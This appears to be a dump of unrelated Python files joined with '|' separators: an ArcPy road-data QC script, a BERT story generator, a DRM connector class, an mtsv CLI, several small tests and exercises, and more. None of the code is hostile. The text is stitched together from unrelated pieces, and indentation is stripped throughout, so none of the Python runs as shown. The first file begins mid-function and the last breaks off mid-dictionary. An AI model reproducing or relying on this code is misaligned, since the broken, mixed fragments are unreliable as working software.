model_checkpoint = Path(self.model_args.model_checkpoint_file)
if not model_checkpoint.exists():
logger.error(
f"Checkpoint not found, cannot load weights from {model_checkpoint}."
)
sys.exit(1)
else:
model_checkpoint = self.model_args.model_checkpoint_file
logger.info(f"Loading model from model checkpoint: {model_checkpoint}")
# load model weights from checkpoint
model = model_class.load_from_checkpoint(
model_checkpoint,
strict=True,
basic_args=self.basic_args,
model_args=self.model_args,
training_args=None,
data_args=self.data_args,
datamodule=self.datamodule,
)
# set model device
model = model.cuda()
# put model in evaluation mode
model.eval()
return model
def test_model(self):
# get data collator required for the model
self.datamodule.collate_fns = self.model.get_data_collators(
self.data_args, None
)
# initialize the training
trainer = pl.Trainer(
gpus=self.basic_args.n_gpu,
num_nodes=self.basic_args.n_nodes,
)
# get test results
return trainer.test(self.model, datamodule=self.datamodule, verbose=False)
|
__file__ = 'OffSystem_v1'
__date__ = '5/29/14'
__author__ = 'ABREZNIC'
import os, arcpy, xlwt, datetime
#date
now = datetime.datetime.now()
curMonth = now.strftime("%m")
curDay = now.strftime("%d")
curYear = now.strftime("%Y")
today = curYear + "_" + curMonth + "_" + curDay
#variables
qcfolder = "C:\\TxDOT\\QC\\OffSystem"
roadways = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.Roadways\\TPP_GIS.APP_TPP_GIS_ADMIN.TXDOT_Roadways"
where = """ RTE_CLASS = '2' OR RTE_CLASS = '3' """
subfiles = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.SUBFILES"
cities = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.City\\TPP_GIS.APP_TPP_GIS_ADMIN.City"
districts = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.District\\TPP_GIS.APP_TPP_GIS_ADMIN.District"
workspace = qcfolder + "\\" + today
if not os.path.exists(workspace):
os.makedirs(workspace)
else:
for file in os.listdir(workspace):
thefile = os.path.join(workspace, file)
os.remove(thefile)
#print "Folder already exists for today. Please ether rename or delete the QC folder with today's date."
def overlap():
print "starting " + str(now)
arcpy.Select_analysis(roadways, workspace + "\\FC_Streets.shp", """ RTE_CLASS = '3' """)
arcpy.Erase_analysis(workspace + "\\FC_Streets.shp", cities, workspace + "\\FC_Streets_Errors.shp")
print "fc"
arcpy.Clip_analysis(roadways, cities, workspace + "\\City_Roads.shp")
print "City"
arcpy.Select_analysis(workspace + "\\City_Roads.shp", workspace + "\\County_Roads_Errors.shp", """ RTE_CLASS = '2' """)
print "cr select"
arcpy.Merge_management([workspace + "\\County_Roads_Errors.shp", workspace + "\\FC_Streets_Errors.shp"], workspace + "\\MergedErrors.shp")
print "merge"
arcpy.SpatialJoin_analysis(workspace + "\\MergedErrors.shp", districts, workspace + "\\City_OverlapErrors.shp")
print "SJ"
arcpy.Delete_management(workspace + "\\City_Roads.shp")
arcpy.Delete_management(workspace + "\\FC_Streets.shp")
arcpy.Delete_management(workspace + "\\County_Roads_Errors.shp")
arcpy.Delete_management(workspace + "\\FC_Streets_Errors.shp")
arcpy.Delete_management(workspace + "\\MergedErrors.shp")
print "end " + str(now)
errors = []
cursor = arcpy.UpdateCursor(workspace + "\\City_OverlapErrors.shp")
for row in cursor:
geom = row.shape
len = geom.length * .000621371
row.setValue("RTE_LEN", len)
cursor.updateRow(row)
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR]
errors.append(rowinfo)
del cursor
del row
return errors
def routeopen():
cursor = arcpy.SearchCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
if row.RTE_OPEN == 1:
rte_subfiles = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for record in rte_subfiles:
status = record.HIGHWAY_STATUS
if status != 4:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append(status)
errorinfo.append("RTE_OPEN = 1 requires HIGHWAY_STATUS = 4")
errors.append(errorinfo)
elif row.RTE_OPEN == 0:
rte_subfiles = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for record in rte_subfiles:
status = record.HIGHWAY_STATUS
if status != 0:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append(status)
errorinfo.append("RTE_OPEN = 0 requires HIGHWAY_STATUS = 0")
errors.append(errorinfo)
else:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append("N/A")
errorinfo.append("RTE_OPEN must be 1 or 0")
errors.append(errorinfo)
return errors
del cursor
del row
def measurelength():
cursor = arcpy.UpdateCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = round(wholelen, 3)
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if testlen <= .003 and abs(rte_len - testlen) > .003:
row.setValue("RTE_LEN", wholelen)
cursor.updateRow(row)
elif abs(shp_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
elif abs(rte_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
elif abs(shp_len - rte_len) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
else:
pass
return errors
del cursor
del row
def subfilelength():
dictionary = {}
cursor = arcpy.SearchCursor(roadways, where)
for row in cursor:
id = row.RTE_ID
len = row.RTE_LEN
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
if id not in dictionary.keys():
dictionary[str(id)] = [len, Mmin, Mmax]
else:
currentrecord = dictionary[id]
currentlength = currentrecord[0]
currentmin = currentrecord[1]
currentmax = currentrecord[2]
newlen = currentlength + len
if Mmin < currentmin:
currentmin = Mmin
if Mmax > currentmax:
currentmax = Mmax
dictionary[str(id)] = [newlen, currentmin, currentmax]
del cursor
del row
errors = []
for i in dictionary.keys():
firstflag = 0
sublength = 0
linevalues = dictionary[i]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + i + "'", "", "", "BMP A")
for row in cursor:
if firstflag == 0:
bmp1 = row.BMP
firstflag += 1
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp-bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append("BMP and EMP difference does not equal the LEN_OF_SECTION. OBJECTID: " + row.OBJECTID)
errors.append(errorinfo)
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
if abs(linemin - bmp1) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
if abs(linemax - emp) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
return errors
def assemblereport():
book = xlwt.Workbook()
print "Overlap Errors..."
overlapsheet = book.add_sheet("City Boundary Overlap")
line = 0
overlapsheet.write(line, 0, "The following Route IDs are County Roads and FC Streets which cross a City Boundary as found in City_OverlapErrors.shp")
line += 1
overlapsheet.write(line, 0, "RTE_ID")
overlapsheet.write(line, 1, "Overlap Length")
overlapsheet.write(line, 2, "District Name")
overlapsheet.write(line, 3, "District Number")
line += 1
overlaplist = overlap()
for i in overlaplist:
overlapsheet.write(line, 0, i[0])
overlapsheet.write(line, 1, i[1])
overlapsheet.write(line, 2, i[2])
overlapsheet.write(line, 3, i[3])
line += 1
print "Route Open Errors..."
opensheet = book.add_sheet("Route Open")
line = 0
opensheet.write(line, 0, "The following Route IDs contain an error between RTE_OPEN in TxDOT_Roadways and ROADWAY_STATUS in SUBFILES")
line += 1
opensheet.write(line, 0, "RTE_ID")
opensheet.write(line, 1, "RTE_OPEN")
opensheet.write(line, 2, "HIGHWAY_STATUS")
opensheet.write(line, 3, "Description")
line += 1
openlist = routeopen()
for i in openlist:
opensheet.write(line, 0, i[0])
opensheet.write(line, 1, i[1])
opensheet.write(line, 2, i[2])
opensheet.write(line, 3, i[3])
line += 1
print "Geometry and Measure Errors..."
geomsheet = book.add_sheet("Geometry and Measures")
line = 0
geomsheet.write(line, 0, "The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN")
line += 1
geomsheet.write(line, 0, "RTE_ID")
geomsheet.write(line, 1, "Measures' Length")
geomsheet.write(line, 2, "Shape Length")
geomsheet.write(line, 3, "RTE_LEN")
line += 1
geomlist = measurelength()
for i in geomlist:
geomsheet.write(line, 0, i[0])
geomsheet.write(line, 1, i[1])
geomsheet.write(line, 2, i[2])
geomsheet.write(line, 3, i[3])
line += 1
print "Subfile Length Errors..."
subsheet = book.add_sheet("Subfile Lengths")
line = 0
subsheet.write(line, 0, "The following Route IDs contain an error between their line and SUBFILES lengths")
line += 1
subsheet.write(line, 0, "RTE_ID")
subsheet.write(line, 1, "District")
subsheet.write(line, 2, "BMP")
subsheet.write(line, 3, "Min Measure")
subsheet.write(line, 4, "EMP")
subsheet.write(line, 5, "Max Measure")
subsheet.write(line, 6, "Subfile Len")
subsheet.write(line, 7, "RTE_LEN")
subsheet.write(line, 8, "Description")
line += 1
sublist = subfilelength()
for i in sublist:
subsheet.write(line, 0, i[0])
subsheet.write(line, 1, i[1])
subsheet.write(line, 2, i[2])
subsheet.write(line, 3, i[3])
subsheet.write(line, 4, i[4])
subsheet.write(line, 5, i[5])
subsheet.write(line, 6, i[6])
subsheet.write(line, 7, i[7])
subsheet.write(line, 8, i[8])
line += 1
book.save(workspace + "\\ErrorReport_" + today + ".xls")
print "and away we go... " + str(now)
assemblereport()
print "that's all folks!" + str(now)
|
from rest_framework import serializers
from thenewboston.constants.network import PRIMARY_VALIDATOR
from thenewboston.serializers.network_block import NetworkBlockSerializer
from thenewboston.transactions.validation import validate_transaction_exists
from v1.self_configurations.helpers.self_configuration import get_self_configuration
class BlockSerializer(NetworkBlockSerializer):
def create(self, validated_data):
raise RuntimeError('Method unavailable')
def update(self, instance, validated_data):
raise RuntimeError('Method unavailable')
def validate(self, data):
"""Verify that correct payment exist for the Primary Validator"""
data = super(BlockSerializer, self).validate(data)
account_number = data['account_number']
message = data['message']
txs = message['txs']
self_configuration = get_self_configuration(exception_class=RuntimeError)
if account_number != self_configuration.account_number:
validate_transaction_exists(
amount=self_configuration.default_transaction_fee,
fee=PRIMARY_VALIDATOR,
error=serializers.ValidationError,
recipient=self_configuration.account_number,
txs=txs
)
return data
|
import sys
# Credit to Hugh Bothwell from http://stackoverflow.com/questions/5084743/how-to-print-pretty-string-output-in-python
class TablePrinter(object):
"Print a list of dicts as a table"
def __init__(self, fmt, sep=' ', ul=None):
"""
@param fmt: list of tuple(heading, key, width)
heading: str, column label
key: dictionary key to value to print
width: int, column width in chars
@param sep: string, separation between columns
@param ul: string, character to underline column label, or None for no underlining
"""
super(TablePrinter,self).__init__()
self.fmt = str(sep).join('{lb}{0}:{1}{rb}'.format(key, width, lb='{', rb='}') for heading,key,width in fmt)
self.head = {key:heading for heading,key,width in fmt}
self.ul = {key:str(ul)*width for heading,key,width in fmt} if ul else None
self.width = {key:width for heading,key,width in fmt}
def row(self, data):
if sys.version_info < (3,):
return self.fmt.format(**{ k:str(data.get(k,''))[:w] for k,w in self.width.iteritems() })
else:
return self.fmt.format(**{ k:str(data.get(k,''))[:w] for k,w in self.width.items() })
def __call__(self, dataList):
_r = self.row
res = [_r(data) for data in dataList]
res.insert(0, _r(self.head))
if self.ul:
res.insert(1, _r(self.ul))
return '\n'.join(res)
|
import argparse
import sys
import datetime
import os
from mtsv.parameters import Parameters
from mtsv.commands import (
Init,
Readprep,
Binning,
Summary,
Analyze,
Extract,
Pipeline
)
from mtsv.parsing import (
TYPES,
make_sub_parser,
parse_config_sections,
get_missing_sections,
add_default_arguments)
from mtsv.utils import(
error,
warn,
set_log_file
)
from mtsv import (
DEFAULT_LOG_FNAME,
DEFAULT_CFG_FNAME)
COMMANDS = {
"analyze": Analyze,
"binning": Binning,
"readprep": Readprep,
"summary": Summary,
"extract": Extract,
"pipeline": Pipeline
}
def add_cfg_to_args(argv, parser):
'''treat config arguments as command line
arguments to catch argparse errors'''
config = get_config_from_argv(argv)
cmd_cfg_section = get_command_from_argv(argv).config_section
config_args = parse_config_sections(
config,
cmd_cfg_section)
for k, v in config_args.items():
fmt_k = "--{}".format(k)
if fmt_k not in argv and v != None:
argv += [fmt_k] + v.split(" ")
missing = set(cmd_cfg_section).intersection(
set(get_missing_sections(config)))
args, snake_args = parser.parse_known_args(argv[1:])
return args, snake_args, missing
def get_command_from_argv(argv):
return COMMANDS[argv[1]]
def get_config_from_argv(argv):
index = -1
opts = ['-c', '--config']
for opt in opts:
if opt in argv:
index = argv.index(opt)
if index != -1:
return argv[index + 1]
def change_wkdir(argv):
index = -1
opts = ['--working_dir', '-wd']
for opt in opts:
if opt in argv:
index = argv.index(opt)
if index != -1:
argv[index + 1] = TYPES['project_dir_type'](argv[index + 1])
def setup_and_run(argv, parser):
"""Setup and run a command."""
change_wkdir(argv)
if argv[1] != "init":
if '--config' in argv or '-c' in argv:
args, snake_args, missing = add_cfg_to_args(argv, parser)
if missing:
warn(
"Section(s) missing in config file, "
"using defaults: {}".format(", ".join(missing)))
else:
args, snake_args = parser.parse_known_args()
args.log_file = set_log_file(
args.log_file,
args.cmd_class.__name__,
args.timestamp)
else:
args, snake_args = parser.parse_args(), []
params = Parameters(args, snake_args)
cmd = args.cmd_class(params)
cmd.run()
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser(
prog="mtsv",
description="Metagenomic analysis pipeline",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.set_defaults(timestamp=datetime.datetime.now().strftime(
'%Y-%m-%d_%H-%M-%S'))
subparsers = parser.add_subparsers(
title="commands", metavar="COMMAND",
help="Pipeline Commands")
parser_init = subparsers.add_parser(
'init',
help="Initializes a directory with a pre-filled parameters file"
)
parser_init.add_argument(
"-c", "--config", type=TYPES['write_handle_type'],
default=DEFAULT_CFG_FNAME,
help="Specify path to write config file, "
"not required if using default config (Default: ./mtsv.cfg)"
)
parser_init.add_argument(
'-wd', "--working_dir", type=str,
default=os.getcwd(),
help="Specify working directory to place output. "
"(default: {})".format(os.getcwd())
)
parser_init.set_defaults(cmd_class=Init)
for command, cmd_class in COMMANDS.items():
make_sub_parser(
subparsers, command, cmd_class)
# Return help if no command is passed
if len(argv) == 1:
parser.print_help(sys.stdout)
sys.exit(0)
try:
setup_and_run(argv, parser)
except KeyboardInterrupt:
error("\n-- Stopped by user --", exception=False)
if __name__ == "__main__":
main()
|
"""
The 20 commonly occurring amino acids are abbreviated by using 20 letters from the English alphabet (all letters
except for B, J, O, U, X, and Z). Protein strings are constructed from these 20 symbols. Henceforth, the term genetic
string will incorporate protein strings along with DNA strings and RNA strings.
The RNA codon table dictates the details regarding the encoding of specific codons into the amino acid alphabet.
Given: An RNA string s corresponding to a strand of mRNA (of length at most 10 kbp).
Return: The protein string encoded by s.
"""
from typing import List
import rps.sequence_problems.sequences as seq
def translate_dna(lines: List[str]) -> str:
"""
:param lines: A line with sequence of DNA string
:return: Sequence of a protein string encoded in DNA
"""
# only one is expected
sequence, = lines
rna = seq.RNA(sequence)
protein = rna.translate_to_protein()
return protein.sequence
|
from typing import Dict
from fastapi.testclient import TestClient
import pytest
from konoha.api.server import create_app
app = create_app()
client = TestClient(app)
@pytest.mark.parametrize(
"tokenizer_params", [
{"tokenizer": "mecab"},
{"tokenizer": "sudachi", "mode": "A"},
{"tokenizer": "sudachi", "mode": "B"},
{"tokenizer": "sudachi", "mode": "C"},
{"tokenizer": "sentencepiece", "model_path": "data/model.knm"},
{"tokenizer": "kytea", "model_path": "data/model.knm"},
{"tokenizer": "character"},
{"tokenizer": "nagisa"},
{"tokenizer": "janome"},
]
)
def test_tokenization(tokenizer_params: Dict):
headers = {"Content-Type": "application/json"}
params = dict(tokenizer_params, text="私は猫")
response = client.post("/api/v1/tokenize", headers=headers, json=params)
assert response.status_code == 200
assert "tokens" in response.json()
|
# Write a program that asks the user for a Login Name and password. Then when they type "lock", they need to type in their name and password to unlock the program.
user = str(input("Please provide a loginname: "))
unlock_user = str()
password = str(input("Please provide your password: "))
unlock_pw = str()
lock = str()
#while lock != "unlock":
# lock = input("The console is now locked. \nYou will be prompted to enter your username and password. \nTo unlock, enter 'unlock': ")
print("To lock your computer type 'lock'.")
while lock != "lock":
lock = input("What is your command? ")
while unlock_user != user:
unlock_user = input("Enter your Username: ")
while unlock_pw != password:
unlock_pw = input("Enter your Password: ")
print("Welcome to the Accelerated World,", user + ".")
|
import pandas as pd
import numpy as np
import torch
def min_max_x(x):
for index, col in enumerate(x.T):
min_col = np.min(col)
max_col = np.max(col)
if min_col != max_col:
x.T[index] = (x.T[index] - min_col)/(max_col - min_col)
else:
x.T[index] = x.T[index] - min_col
return x
def load_dataset(path='./processed_dataset/data.csv', split=0.8, shuffle=True, seed=0):
np.random.seed(seed)
df = pd.read_csv(path)
df = df.values
if shuffle:
np.random.shuffle(df)
train = df[:int(df.shape[0]*split)]
validation = df[int(df.shape[0]*split):]
train_x, train_y = train.T[:12].T, train.T[12:].T
validation_x, validation_y = validation.T[:12].T, validation.T[12:].T
train_x, validation_x = min_max_x(train_x), min_max_x(validation_x)
train_x, train_y, validation_x, validation_y = train_x.astype(np.float32), train_y.astype(np.float32), validation_x.astype(np.float32), validation_y.astype(np.float32)
train_x, train_y, validation_x, validation_y = torch.from_numpy(train_x), torch.from_numpy(train_y), torch.from_numpy(validation_x), torch.from_numpy(validation_y)
return train_x, train_y, validation_x, validation_y
if __name__ == '__main__':
train_x, train_y, validation_x, validation_y = load_dataset()
print(train_x.shape, train_y.shape, validation_x.shape, validation_y.shape)
|
from pytorch_transformers import BertTokenizer, BertForMaskedLM
import torch
import random
import numpy as np
from pytorch_transformers import BertTokenizer, BertForMaskedLM
import nltk
import argparse
import string
torch.manual_seed(0)
np.random.seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
random.seed(0)
parser = argparse.ArgumentParser()
parser.add_argument('--file', type=str, default='../PlotExtraction/fairy.txt')
parser.add_argument('--outfile', type=str, default='bert_fairy.txt')
parser.add_argument('--model', type=str, default='./bert/fairy')
args = parser.parse_args()
tokenizer = BertTokenizer.from_pretrained(args.model)
model = BertForMaskedLM.from_pretrained(args.model, output_attentions=False)
model.eval()
def capitalizeFirst(phrase):
words = phrase.split()
words[0] = words[0].capitalize()
return ' '.join(words)
def is_punctuation(s):
return len(set(s).intersection(set(string.punctuation))) > 0
def getScore(sentence):
tokenized_text = tokenizer.tokenize('[CLS] ' + "[MASK] " + sentence + ' [SEP]')
mask_idxs = duplicates(tokenized_text, "[MASK]")
if decoding_type == 'right to left':
focus_mask_idx = max(mask_idxs)
else:
focus_mask_idx = random.choice(mask_idxs)
mask_idxs.pop(mask_idxs.index(focus_mask_idx))
temp_tokenized_text = tokenized_text.copy()
temp_tokenized_text = [j for i, j in enumerate(temp_tokenized_text) if i not in mask_idxs]
temp_indexed_tokens = tokenizer.convert_tokens_to_ids(temp_tokenized_text)
ff = [idx for idx, i in enumerate(temp_indexed_tokens) if i == 103]
temp_segments_ids = [0] * len(temp_tokenized_text)
tokens_tensor = torch.tensor([temp_indexed_tokens])
segments_tensors = torch.tensor([temp_segments_ids])
with torch.no_grad():
outputs = model(tokens_tensor, token_type_ids=segments_tensors)
predictions = outputs[0]
# get score of punctuation and compare to predicted score
end_score = predictions[0, ff][0, tokenizer.convert_tokens_to_ids('.')]
return end_score
def duplicates(lst, item):
return [i for i, x in enumerate(lst) if x == item]
file = open(args.file, 'r')
output = open(args.outfile, 'w')
for line in file:
parsed = line.split('\t')
character = parsed[0]
story = parsed[1:]
out = []
for i in range(len(story) - 1):
prev = story[i] + '.'
next = story[i + 1] + '.'
sentences = []
for sentence_count in range(3):
length = random.randint(3, 5)
generated = '.'
for i in range(length):
decoding_type = 'right to left'
tmp = character + ' ' + "[MASK] " * (length - i) + generated
fill = ' '.join(['[CLS]', prev, tmp, next, '[SEP]'])
# print(fill)
tokenized_text = tokenizer.tokenize(fill)
mask_idxs = duplicates(tokenized_text, "[MASK]")
if decoding_type == 'right to left':
focus_mask_idx = max(mask_idxs)
else:
focus_mask_idx = random.choice(mask_idxs)
mask_idxs.pop(mask_idxs.index(focus_mask_idx))
temp_tokenized_text = tokenized_text.copy()
temp_tokenized_text = [j for i, j in enumerate(temp_tokenized_text) if i not in mask_idxs]
temp_indexed_tokens = tokenizer.convert_tokens_to_ids(temp_tokenized_text)
ff = [idx for idx, i in enumerate(temp_indexed_tokens) if i == 103]
temp_segments_ids = [0] * len(temp_tokenized_text)
tokens_tensor = torch.tensor([temp_indexed_tokens])
segments_tensors = torch.tensor([temp_segments_ids])
with torch.no_grad():
outputs = model(tokens_tensor, token_type_ids=segments_tensors)
predictions = outputs[0]
k = 20
predicted_token = '.'
while is_punctuation(predicted_token):
predicted_index = random.choice(predictions[0, ff].argsort()[0][-k:]).item()
predicted_score = predictions[0, ff][0, predicted_index]
predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]
tokenized_text[focus_mask_idx] = predicted_token
# get score of punctuation and compare to predicted score
# end_score = getScore(character + ' ' + predicted_token + ' ' + generated + ' ' + sentence)
# print(end_score)
# if end_score > 5:
# break
if generated != '.':
generated = ' ' + generated
generated = predicted_token + generated
final = capitalizeFirst(character) + ' ' + generated
next = final + ' ' + next
print(final)
sentences.append(final)
out.append(' '.join(sentences))
print(len(out), len(story))
for i in range(len(story) - 1):
output.write(story[i] + '. ' + out[i] + ' ')
output.write(story[-1] + '.')
output.write('\n')
|
import fcntl
import ctypes
from .base import DrmObject, DrmMode
from .drm_h import DRM_IOCTL_MODE_GETCONNECTOR
from .drm_mode_h import DrmModeGetConnectorC, DrmModeModeinfoC, drm_connector_type_id_name, DRM_MODE_OBJECT_CONNECTOR
# ("encoders_ptr", c_uint64),
# ("modes_ptr", c_uint64),
# ("props_ptr", c_uint64),
# ("prop_values_ptr", c_uint64),
#
# ("count_modes", c_uint32),
# ("count_props", c_uint32),
# ("count_encoders", c_uint32),
#
# ("encoder_id", c_uint32),
# ("connector_id", c_uint32),
# ("connector_type", c_uint32),
# ("connector_type_id", c_uint32),
#
# ("connection", c_uint32),
# ("mm_width", c_uint32),
# ("mm_height", c_uint32),
# ("subpixel", c_uint32),
class DrmConnector(DrmObject):
def __init__(self, drm, id):
self._drm = drm
self.id = int(id)
self._encoders = []
self.fetch()
def fetch(self):
arg = DrmModeGetConnectorC()
arg.connector_id = self.id
fcntl.ioctl(self._drm.fd, DRM_IOCTL_MODE_GETCONNECTOR, arg)
encoder_ids = (ctypes.c_uint32*arg.count_encoders)()
arg.encoders_ptr = ctypes.cast(ctypes.pointer(encoder_ids), ctypes.c_void_p).value
modes_c = (DrmModeModeinfoC*arg.count_modes)()
arg.modes_ptr = ctypes.cast(ctypes.pointer(modes_c), ctypes.c_void_p).value
# Use get_props() instead
arg.count_props = 0
fcntl.ioctl(self._drm.fd, DRM_IOCTL_MODE_GETCONNECTOR, arg)
self._arg = arg
self.type = arg.connector_type
self.type_id = arg.connector_type_id
self.status = arg.connection
self.mm_width = arg.mm_width
self.mm_height = arg.mm_height
self.subpixel = arg.subpixel
for i in range(arg.count_encoders):
self._encoders.append(self._drm.get_encoder(encoder_ids[i]))
if (arg.encoder_id):
self.encoder = self._drm.get_encoder(arg.encoder_id)
else:
self.encoder = None
self.modes = [DrmMode(modes_c[i]) for i in range(arg.count_modes)]
self.name = "%s-%s" %(drm_connector_type_id_name(self.type), self.type_id)
self.get_props(DRM_MODE_OBJECT_CONNECTOR)
@property
def encoders(self):
return list(self._encoders)
@property
def preferred_mode(self):
for mode in self.modes:
if mode.preferred:
return mode
return None
def find_mode(self, modestr=None, vrefresh=None):
#print "find_modes(%s,%s)\n" % (modestr, vrefresh)
mode = None
if modestr:
for m in self.modes:
if m.name == modestr:
if vrefresh is None or m.vrefresh == vrefresh:
mode = m
break
else:
mode = self.preferred_mode
return mode
|
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LdpNotification(Base):
__slots__ = ()
_SDM_NAME = 'ldpNotification'
_SDM_ATT_MAP = {
'HeaderVersion': 'ldpNotification.header.version-1',
'HeaderPduLengthinOctets': 'ldpNotification.header.pduLengthinOctets-2',
'HeaderLsrID': 'ldpNotification.header.lsrID-3',
'HeaderLabelSpace': 'ldpNotification.header.labelSpace-4',
'HeaderUBit': 'ldpNotification.header.uBit-5',
'HeaderType': 'ldpNotification.header.type-6',
'HeaderLength': 'ldpNotification.header.length-7',
'HeaderMessageID': 'ldpNotification.header.messageID-8',
'StatusTLVUBit': 'ldpNotification.header.statusTLV.uBit-9',
'StatusTLVFBit': 'ldpNotification.header.statusTLV.fBit-10',
'StatusTLVType': 'ldpNotification.header.statusTLV.type-11',
'StatusTLVLength': 'ldpNotification.header.statusTLV.length-12',
'SuccessEBit': 'ldpNotification.header.statusTLV.statusCode.success.eBit-13',
'SuccessFBit': 'ldpNotification.header.statusTLV.statusCode.success.fBit-14',
'SuccessStatusData': 'ldpNotification.header.statusTLV.statusCode.success.statusData-15',
'BadLDPIdentifierEBit': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.eBit-16',
'BadLDPIdentifierFBit': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.fBit-17',
'BadLDPIdentifierStatusData': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.statusData-18',
'BadProtocolVersionEBit': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.eBit-19',
'BadProtocolVersionFBit': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.fBit-20',
'BadProtocolVersionStatusData': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.statusData-21',
'BadPDULengthEBit': 'ldpNotification.header.statusTLV.statusCode.badPDULength.eBit-22',
'BadPDULengthFBit': 'ldpNotification.header.statusTLV.statusCode.badPDULength.fBit-23',
'BadPDULengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badPDULength.statusData-24',
'UnknownMessageTypeEBit': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.eBit-25',
'UnknownMessageTypeFBit': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.fBit-26',
'UnknownMessageTypeStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.statusData-27',
'BadMessageLengthEBit': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.eBit-28',
'BadMessageLengthFBit': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.fBit-29',
'BadMessageLengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.statusData-30',
'UnknownTLVEBit': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.eBit-31',
'UnknownTLVFBit': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.fBit-32',
'UnknownTLVStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.statusData-33',
'BadTLVLengthEBit': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.eBit-34',
'BadTLVLengthFBit': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.fBit-35',
'BadTLVLengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.statusData-36',
'MalformedTLVValueEBit': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.eBit-37',
'MalformedTLVValueFBit': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.fBit-38',
'MalformedTLVValueStatusData': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.statusData-39',
'HoldTimerExpiredEBit': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.eBit-40',
'HoldTimerExpiredFBit': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.fBit-41',
'HoldTimerExpiredStatusData': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.statusData-42',
'ShutdownEBit': 'ldpNotification.header.statusTLV.statusCode.shutdown.eBit-43',
'ShutdownFBit': 'ldpNotification.header.statusTLV.statusCode.shutdown.fBit-44',
'ShutdownStatusData': 'ldpNotification.header.statusTLV.statusCode.shutdown.statusData-45',
'LoopDetectedEBit': 'ldpNotification.header.statusTLV.statusCode.loopDetected.eBit-46',
'LoopDetectedFBit': 'ldpNotification.header.statusTLV.statusCode.loopDetected.fBit-47',
'LoopDetectedStatusData': 'ldpNotification.header.statusTLV.statusCode.loopDetected.statusData-48',
